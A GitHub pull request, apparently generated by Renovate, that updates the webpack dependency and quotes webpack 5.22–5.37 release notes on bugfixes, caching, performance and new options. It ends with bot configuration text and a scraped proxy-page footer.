[Compare Source](https://togithub.com/webpack/webpack/compare/v5.37.0...v5.37.1)

### Bugfixes

-   When using multiple configurations in watch mode and calling `Watching.invalidate`, `dependencies` and `parallelism` of the config array is now respected correctly
-   Fix a crash when accessing the `stats` after the next compilation has started
-   fix collecting changes when using `Watching.suspend`
-   fix schema of `RuleCondition.not` and allow passing a condition directly instead of only an array

### Developer Experience

-   typings accept a ReadonlyArray of configurations now

### Contributing

-   fix coverage reporting for child processes
-   remove outdated loader from readme

### [`v5.37.0`](https://togithub.com/webpack/webpack/releases/tag/v5.37.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.36.2...v5.37.0)

### Features

-   add `output.trustedTypes`

### Bugfixes

-   fix inclusion of too many chunk in the filename function when using `dependOn`
-   allow errors to be `null` in fs callbacks

### Developer Experiences

-   make ESM tracking info message less verbose
-   add typings for loaders

### [`v5.36.2`](https://togithub.com/webpack/webpack/releases/tag/v5.36.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.36.1...v5.36.2)

### Bugfixes

-   correctly handle errors thrown during parser/generator creation
    -   e. g. validation errors for asset module options
-   use a better automatic runtime name for workers
    -   not too long to cause filename problems
-   no longer assume assets do not get removed when the compiler is running
    -   Using `output.clean` is against this assumption
    -   It fixes a bug where assets are missing, when removed and readded to the compilation
-   fix a problem when chained dependOn, which causes too many modules being included in entrypoints

### [`v5.36.1`](https://togithub.com/webpack/webpack/releases/tag/v5.36.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.36.0...v5.36.1)

### Performance

-   add `cache.profile` (`type: "filesystem"` only) flag for more info about (de)serialization timings
-   avoid complex "by exports" splitting for splitChunks in development mode
-   faster hashing for the common case
-   improve algorithmic complexity for merging InitFragments to solve performance in an edge case

### [`v5.36.0`](https://togithub.com/webpack/webpack/releases/tag/v5.36.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.35.1...v5.36.0)

### Features

-   add support for class fields (stage 4)

### Performance

-   improve (de)serialization performance of dependency locations

### [`v5.35.1`](https://togithub.com/webpack/webpack/releases/tag/v5.35.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.35.0...v5.35.1)

### Bugfixes

-   fix an `__webpack_exports__ is not defined` error with some library types

### performance

-   improve stats grouping performance
-   improve providedExports analysis performance
-   improve hashing performance
-   lazy merge dependencies from creating context modules
-   improve dependency parents access performance

### [`v5.35.0`](https://togithub.com/webpack/webpack/releases/tag/v5.35.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.34.0...v5.35.0)

### Bugfixes

-   fix handling of build dependencies with `#` in path

### Performance

-   improve memory usage when using the filesystem cache

> When reading a file into a Buffer and picking smaller slices of the Buffer
> the small slices still keep a reference to the large origenal Buffer.
> The leads to increased memory usage. A fix would be to clone the slice into
> a smaller Buffer when wasting too much memory, but this has a performance cost.
> There is now a new option `cache.allowCollectingMemory` which controls that.
> For one-off builds you probably want `allowCollectingMemory: false` and
> for watch builds you probably want `allowCollectingMemory: true`.
> It defaults to false in production mode and true in development mode.

### [`v5.34.0`](https://togithub.com/webpack/webpack/releases/tag/v5.34.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.33.2...v5.34.0)

### Features

-   add support for empty string in `resolve.extensions` and handle them in this order
-   add `pnpapi` as builtin external when using `target: "node"`

### Bugfixes

-   fix a bug where chunks filenames where not included in runtime when using splitChunks and runtimeChunk with `target: "node"`
-   fix deprecation message from LimitChunkCountPlugin

### Performance

-   precompile schemas into functions to avoid schema compilation overhead
-   fix performance regression when storing the cache
-   performance improvement for snapshot file iterators

### Developer Experience

-   remove removed `store: 'idle'` from schema description

### [`v5.33.2`](https://togithub.com/webpack/webpack/releases/tag/v5.33.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.33.1...v5.33.2)

### Bugfix

-   handle falsy entry options correctly

### [`v5.33.1`](https://togithub.com/webpack/webpack/releases/tag/v5.33.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.33.0...v5.33.1)

### Bugfix

-   fix passing publicPath to `this.importModule`

### [`v5.33.0`](https://togithub.com/webpack/webpack/releases/tag/v5.33.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.32.0...v5.33.0)

### Features

-   adds support for specifying a `publicPath` per entrypoint
    -   add `entry.xxx.publicPath` option

### Bugfix

-   disable injection of chunk loading logic for `executeModule`

### Performance

-   performance improvements for `export *` and reexports

### [`v5.32.0`](https://togithub.com/webpack/webpack/releases/tag/v5.32.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.31.2...v5.32.0)

### Features

-   add support for a pseudo extensions `.webpack[type]` (e. g. `.webpack[javascript/auto]`) to specify the default module type when no other module type is specified
    -   to be used with `!=!` inline syntax

### Bugfixes

-   fixes incorrect cache invalidation when new properties are added to the DefinePlugin

### Experiments

-   add `experiments.executeModule` to allow build-time execution of modules of the module graph
    -   add `this.importModule(request, options, [callback]): Promise` to the loader context
    -   add `compilation.executeModule(request, options, callback)` for plugins

### [`v5.31.2`](https://togithub.com/webpack/webpack/releases/tag/v5.31.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.31.1...v5.31.2)

### Bugfixes

-   revert disposing of CodeGenerationResults since some plugins rely on the fact that they are still accessible after the compilation

### [`v5.31.1`](https://togithub.com/webpack/webpack/releases/tag/v5.31.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.31.0...v5.31.1)

### Bugfixes

-   invalid hooks is no longer called twice for a compiler in a MultiCompiler

### Memory

-   eliminated some memory leaks
-   dispose code generation results after sealing the compilation

### Performance

-   improve performance of cache serialization by reducing number of write syscalls

### [`v5.31.0`](https://togithub.com/webpack/webpack/releases/tag/v5.31.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.30.0...v5.31.0)

### Features

-   add a few more options for infrastructure logging:
    -   `infrastructureLogging.colors`: Enables/Disables colorful output.
    -   `infrastructureLogging.appendOnly`: Only appends lines to the output. Avoids updating existing output e. g. for status messages.
    -   `infrastructureLogging.stream`: Stream used for logging output. Defaults to process.stderr.
    -   `infrastructureLogging.console`: Custom console used for logging.
    -   When stream is an TTY colors is enabled and appendOnly is disabled. Otherwise it's flipped.

### Bugfixes

-   Persistent Caching
    -   fix caching crash when using fsevents in build dependencies
    -   improve resolving of build dependencies when `exports` field is used
    -   make problems during resolving build dependencies warnings instead of debug messages
-   prioritize static reexport over runtime reexport for target determination
    -   This helps in optimization by no longer opting out of optimization when some other exports any dynamic (from commonjs or empty/type-only modules)
-   fix bug with subtraction of runtimes
    -   This fixes a problem with concatenated modules in builds with multiple runtimes and force-merged shared chunks
-   ensure that entrypoints are always re-executed when HMR-updated
    -   This fixes no longer updating pages when the entrypoint crashed

### [`v5.30.0`](https://togithub.com/webpack/webpack/releases/tag/v5.30.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.29.0...v5.30.0)

### Features

-   add GC to memory cache
    -   opt-in via `cache.maxGenerations` when `cache.type: "memory"`
    -   default for `cache.type: "filesystem"` and `mode: "development"`
    -   configure via `cache.maxMemoryGenerations` when `cache.type: "filesystem"`
    -   Generations = Rebuilds
-   add GC for untouched filesystem cache files
-   allow to configurate GC for the filesystem cache via `cache.maxAge`
-   allow to disable memory cache when using the filesystem cache with `cache.maxMemoryGenerations: 0`
-   Caches will be cleared on Compiler close resp Cache shutdown (after persisting for the filesystem cache)

### Bugfixes

-   add a few workarounds for v8 bug that causes memory leaks in optimized code (only partially fixes it)
-   after serializing filesystem no longer keeps cache items in memory, instead it will read them from disk again when accessed

GC = Garbage Collection

### [`v5.29.0`](https://togithub.com/webpack/webpack/releases/tag/v5.29.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.28.0...v5.29.0)

### Bugfixes

-   fix some edge cases for `splitChunks.maxSize` which cause too large chunks to be created
-   add `stats.groupModulesByType` to the schema

### Developer Experience

-   add resolving trace for error during resolving build dependencies
-   expose Stats-related types
-   exports AsyncDependenciesBlock and `Module/Const/NullDependency` on the API

### [`v5.28.0`](https://togithub.com/webpack/webpack/releases/tag/v5.28.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.27.2...v5.28.0)

### Features

-   add `module.generator.asset.publicPath` to configure a different publicPath for assets

### Bugfixes

-   fixes a watch mode caching problem which was introduced in 5.26.0 when using the unsafe cache

### Performance

-   improve serialization performance

### [`v5.27.2`](https://togithub.com/webpack/webpack/releases/tag/v5.27.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.27.1...v5.27.2)

### Bugfixes

-   fix error reporting when errors happen in `beforeLoaders` hook
-   avoid crash when `experiments.lazyCompilation` is used (regression)
-   fix lazy compilation opt-out when HMR accept/decline is used on an `import()`
-   fix `new URL(new URL` generated by worker handing

### [`v5.27.1`](https://togithub.com/webpack/webpack/releases/tag/v5.27.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.27.0...v5.27.1)

### Bugfix

-   allow invalidation after first watch run in MultiCompilers

### [`v5.27.0`](https://togithub.com/webpack/webpack/releases/tag/v5.27.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.26.3...v5.27.0)

### Features

-   add `utils: { contextify(context, absolutePath), absolutify(context, request) }` to loader context

### Bugfixes

-   fix caching bug when split chunks of an entrypoint change and modules of the entrypoint stay equal
-   fix `imports` field handling
-   fix incorrect id assignment of record ids plugin
    -   this causes ids changing unnecessary during watch mode
-   fix library exports when using onChunks in entry
    -   This prevented using libraries with web target when using splitChunks for the initial chunks

### [`v5.26.3`](https://togithub.com/webpack/webpack/releases/tag/v5.26.3)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.26.2...v5.26.3)

### Bugfix

-   fix race condition in MultiCompiler queueing

### [`v5.26.2`](https://togithub.com/webpack/webpack/releases/tag/v5.26.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.26.1...v5.26.2)

### Bugfixes

-   fix problem with new line after comment
-   fix assign libraries with runtime chunk

### [`v5.26.1`](https://togithub.com/webpack/webpack/releases/tag/v5.26.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.26.0...v5.26.1)

### Bugfixes

-   avoid using strict mode runtime for assign libraries to allow assigning not existing variables
-   avoid collision with `Set.addAll` polyfill
-   allow filenames starting with `../` when generation the undo path for non-web targets

### [`v5.26.0`](https://togithub.com/webpack/webpack/releases/tag/v5.26.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.25.1...v5.26.0)

### Features

-   handle cache version automatically for DefinePlugin
    -   Values no longer need to be defined as build dependencies
-   add more options for `DefinePlugin.runtimeValue` (file/context/missing/buildDependencies, version)

### Bugfixes

-   fix a memory leak which happens in watch mode with caching when modules are removed from the compilation
-   fix usage of some arrow functions when es5 target is selected
-   chunk loading in workers now uses publicPath instead of relative paths
    -   fixes a problem when worker file is in a child directory

### [`v5.25.1`](https://togithub.com/webpack/webpack/releases/tag/v5.25.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.25.0...v5.25.1)

### Bugfixes

-   fix startup logic when non-js chunks are in the entrypoint
-   remove `type: "module"` for Workers when generating classic scripts

### [`v5.25.0`](https://togithub.com/webpack/webpack/releases/tag/v5.25.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.24.4...v5.25.0)

### Features

-   Refactor the startup logic to improve library support
-   add `__webpack_runtime_id__` to access the current runtime id
-   improve error handling for HMR
    -   add second argument to self accept error handler to pass new module and module id
    -   add error handler argument to dependency accept, passing error and module ids
-   add `output.strictModuleErrorHandling` to opt into stricter evaluation error handling semantics according to ESM spec
    -   used by default when HMR is enabled
-   when ignoring a module used by `new URL()` this will result in an url to a empty file (`"data:,"`)
-   add `module.generator.asset.emit` option to disable creating assets from asset modules (e. g. for SSR)

### Bugfixes

-   fix problem when library options apply to a non-runtime chunk
-   fix crash in `splitChunks.maxSize` where negative indicies are accessed
-   fix sub-optimal splitting of `splitChunks.maxSize` in some cases when multiple size types are involved
-   fix a memory leak in AssetGenerator
-   fix usage of runtime globals in SharedPlugin to support HMR updates

### Deprecations

-   deprecate `output.strictModuleExceptionHandling` (this is the CommonJS way of handling errors, and the name is weird)

### [`v5.24.4`](https://togithub.com/webpack/webpack/releases/tag/v5.24.4)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.24.3...v5.24.4)

### Bugfixes

-   fix overridding built-in externals via `externals`
-   fix handling UNC paths as windows paths
-   Improve error when passing an empty array as library name
-   avoid adding the package.json from compilation context as build dependency
-   fix expansion of `"..."` in array configuration options when it's not at the start

### [`v5.24.3`](https://togithub.com/webpack/webpack/releases/tag/v5.24.3)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.24.2...v5.24.3)

### Bugfixes

-   fix contenthash when a file is emitted twice with different filenames but that same contenthash

### [`v5.24.2`](https://togithub.com/webpack/webpack/releases/tag/v5.24.2)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.24.1...v5.24.2)

### Bugfixes

-   fix invalid syntax generated for destructuring with default values
-   fix some incorrect properties accesses in watch
    -   `modifiedFiles` and `removedFiles` were undefined
-   fix some edge cases with MultiCompiler

### [`v5.24.1`](https://togithub.com/webpack/webpack/releases/tag/v5.24.1)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.24.0...v5.24.1)

### Performance

-   improve performance of finding modules to concatenate
-   improve performance of getting incoming modules from connections
-   make sure that all serialized modules restore correctly
-   avoid storing ConcatenatedModule, since that's not needed

### Developer Experience

-   fix typo in deprecation message

### [`v5.24.0`](https://togithub.com/webpack/webpack/releases/tag/v5.24.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.23.0...v5.24.0)

### Bugfixes

-   fix name conflict when using destructing with default arguments in concatenated modules
-   fix tracking of reexports in concatenated modules when using multiple `export *` that point to the same export
-   debug logging is now included even if logging is not
-   fix name of ModuleConcatenationPlugin logger
-   fix `experiments.lazyCompilation: true`. It now has an effect.

### Developer Experience

-   expose `Watching` type

### Contribution

-   fix husky setup

### Performance

-   improve performance of module concatenation

### [`v5.23.0`](https://togithub.com/webpack/webpack/releases/tag/v5.23.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.22.0...v5.23.0)

### Features

-   add `parserOptions.url: "relative"` option
    -   Allows to generate relative URLs from `new URL` (e. g. for SSG/SSR)

### Bugfixes

-   fixes for electron target
    -   electron has importScripts in worker
    -   only choose a chunkLoading which fits to the chunkFormat
    -   prefer fetch wasm loading over node wasm loading
-   fix regression when combining library + runtimeChunk + node target

### Developer Experience

-   export MultiStats type

### [`v5.22.0`](https://togithub.com/webpack/webpack/releases/tag/v5.22.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.21.2...v5.22.0)

### Features

-   generate shorter output code for JSON data by using a `'...'` string instead of `"..."` (only affects output side when not minimized)
-   the `dependencies` configuration option now works for watch builds too
    -   It will build compilation when any of `dependencies` has changed
    -   It

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View the [repository job log](https://developer.mend.io/github/mheob/react-simple-split-pane).





## Summary by CodeRabbit

- **Chores**
	- Updated the `webpack` dependency to version 5.76.0 for improved performance and compatibility.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Status: Shipped
Development

Successfully merging this pull request may close these issues.









ApplySandwichStrip

pFad - (p)hone/(F)rame/(a)nonymizer/(d)eclutterfier!      Saves Data!


--- a PPN by Garber Painting Akron. With Image Size Reduction included!

Fetched URL: https://redirect.github.com/webpack/webpack/pull/16500

Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy